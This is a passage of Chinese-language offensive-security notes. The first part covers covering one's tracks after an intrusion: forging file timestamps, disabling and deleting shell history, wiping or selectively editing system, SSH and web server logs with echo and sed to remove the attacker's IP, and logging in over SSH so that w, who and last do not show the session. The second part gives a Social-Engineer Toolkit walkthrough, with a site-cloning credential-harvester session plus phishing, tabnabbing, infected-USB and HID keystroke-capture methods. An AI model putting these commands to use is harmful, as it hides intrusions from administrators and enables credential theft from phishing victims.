• 剪贴板里有时会隐藏着我们太多的秘密,如果不关机就直接离开,下一个上机的人只要按一下Ctrl+V,刚才在剪贴板中的信息就被别人“盗取”了。无需研究如何清空剪贴板,只需用Ctrl+C再随便复制一段无关的内容,原来的内容就会被覆盖。

清理TEMP文件夹中的记录

• 许多应用程序通常会临时保存你的工作结果,离机前应删除被存放在C:(系统安装盘符)Documents and SettingsAdministrator(当前登录用户)Local SettingsTemp目录下的临时文件。

Linux

修改文件时间戳

ls -l test.txt# 修改文件的修改时间和访问时间touch -d "2018-04-18 08:00:00" test.txttouch -t 0101080000 test

清除history历史命令记录

#方法1

history       # 查看历史操作命令(在Kali Linux下无效)cat  ~/.bash_history       # history记录文件vim ~/.bash_historyhistory –c

#方法2

使用vim打开一个文件

vim test.txt# 设置vim不记录命令,vim会将命令历史记录,保存在viminfo文件中。:set history=0:!command

#方法3

#通过修改配置文件/etc/profile,使系统不再保存命令记录。默认情况下历史命令将保存1000条,可以将该值改为0,然后保存并退出,最后重启系统使得配置文件生效。

HISTSIZE=0

#方法4

#登录后执行下面命令,不记录历史命令(.bash_history)

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

#方法5

仅在Kali Linux下

rm -rf /root/.zsh_history

清除系统日志痕迹

/var/log/btmp 记录所有登录失败信息,使用lastb命令查看

/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看

/var/log/wtmp记录所有用户的登录、注销信息,使用last命令查看

/var/log/utmp记录当前已经登录的用户信息,使用w,who,users等命令查看

/var/log/secure 记录与安全相关的日志信息

/var/log/message 记录系统启动后的信息和错误日志

echo > /var/log/btmp:#清除登录系统失败的记录,查看用lastb命令

echo > /var/log/wtmp:#清除登录系统成功的记录,查看用last命令

echo > /var/log/lastlog:清除用户最后一次登录时间,查看用lastlog命令

echo >/var/log/utmp:清除当前登录用户的信息,查看使用w,who,users等命令

cat /dev/null >/var/log/secure:清除安全日志记录

cat /dev/null >/var/log/message:清除系统日志记录

echo > /var/log/secure //登录信息

echo > /var/log/messages

echo>/var/log/syslog //记录系统日志的服务

echo>/var/log/xferlog

echo>/var/log/auth.log

echo>/var/log/user.log

cat /dev/null > /var/adm/sylog

cat /dev/null > /var/log/maillog

cat /dev/null > /var/log/openwebmail.log

cat /dev/null > /var/log/mail.info

清除系统日志痕迹

#日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。

# 删除所有匹配到字符串的行,比如以当天日期或者自己的登录IP

sed -i '/自己的ip/'d test.txt

sed -i '/192.168.1.2/'d test.txt

# 全局替换登录IP地址:

sed 's/要被取代的字串/新的字串/g'

sed -i 's/192.168.1.1/192.168.1.2/g' test.txt

隐藏远程SSH登录记录

#隐身登录系统,不会被w、who、last等指令检测到。

ssh -T root@192.168.0.1 /bin/bash -i

#不记录ssh公钥在本地.ssh目录中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –I

清除Web入侵痕迹

#直接替换日志ip地址

sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log

#常见日志地址

Apache

%APATCH_HOME%//logs/access.log # 访问日志

%APATCH_HOME%/logs/error.log # 错误日志

Nginx

%NHINX_HOME%/logs/access.log # 访问日志

%NHINX_HOME%/logs/error.log # 错误日志

Tomcat

%TOMCAT_HOME%/logs/localhost_access_log.YYYY_MM_DD.txt # 请求日志

%TOMCAT_HOME%/logs/catalina.YYYY_MM_DD.log # 启动日志

%TOMCAT_HOME%/logs/localhost.YYYY_MM_DD.log # 本地日志

%TOMCAT_HOME%/logs/host-manager.YYYY_MM_DD.log # manager管理日志

%TOMCAT_HOME%/logs/manager.YYYY_MM_DD.log # manager专有日志

清除MySQL痕迹

rm ~/.mysql_historycat /dev/null > ~/.mysql_history

社会工程学

git clone https://github.com/trustedsec/social-engineer-toolkit/setoolkit/cd setoolkitpip3 install -r requirements.txtpython setup.pygedit /etc/setoolkit/set.config

网络钓鱼攻击(Spear-Phishing Attack Vector)

利用文件格式漏洞(如PDF)等生成后门并通过email(GMAIL,SENDMAIL,)向目标发送带后门附件的电子邮件,诱使目标打开附件激活后门。

例子:

#cd /usr/share/set# ./setoolkit select from the menu1) Social-Engineering Attacks1) Perform a Mass Email Attack3) Credential Harvester Attack Method2) Site Cloner…set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150set:webattack> Enter the url to clone: www.baidu.com[*] Cloning the website: http://www.baidu.com[*] This could take a little bit...The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.[*] The Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:

WEB 方式攻击

SET 可以克隆一个网站并植入后门以此迷惑目标打开此网站并中招。

Java Applet 方式

最成功的方式之一,并不是利用java 的漏洞,而是当目标浏览含后门的仿冒站点时会被询问是否允许执行web 中的java applet,一旦点击允许则payload 开始运行,目标将被重定向到真实的网站。

用户端(Client-side)web exploit 方式

利用用户端存在的软件漏洞,一般使用0day进行攻击的效果最好。

账号密码获取(Username and Password Harvesting)

通过克隆一个目标站并诱使攻击目标登陆,截获其账号密码。例如截获GMAIL 密码。

标签页绑架(Tabnabbing):当目标打开多个标签页浏览网站并切换标签页时,网站侦测到目标的行为并显示让目标等待的信息,恰好目标打开了被绑架的标签页并要求在相似程度惊人的网站里输入登陆凭据,当目标输入之后登陆信息即被截获,同时被重定向到真实网站。

中间人攻击(Man-Left-in-the-Middle)

此方式使用已经被攻陷的网站的HTTP 请求或者网站的XSS 漏洞让用户的登陆信息发送至攻击者的HTTP 服务器。如果你发现了一个网站的XSS 漏洞,可以利用此漏洞构造一个URL发送给目标诱使其打开并登陆以截获登陆信息。

Web Jacking

当目标打开我们的网站时会有一个链接显示为正确的web 地址,此时若目标打开此仿冒链接会被定向到我们的仿冒网站,其登陆信息会被截获。

混合模式(multi-attack)

可同时使用以上多种攻击手段以提高成功率。

介质感染攻击(Infectious Media Generator)

可以让你生成一张光盘或者U盘,里面包含autorun.inf 来运行指定的后门文件或者file-format 漏洞文件。

迷你USB 人机接口设备(Teensy USB HID)

当电脑插入USB 设备且autorun.inf 被禁用时,可使用此方法将USB 设备模拟成一个键盘或鼠标设备,进而截获目标机器的击键记录。

SET 其他特殊功能

包括SET 交互式shell,可用来替代meterpreter;远程管理工具(RATTE);HTTP 隧道,当目标主机只开放HTTP 端口对外放行时可通过此功能与主机进行通信;WEB-GUI,包含了常用攻击和无线攻击向导,输入./set-web 即可运行。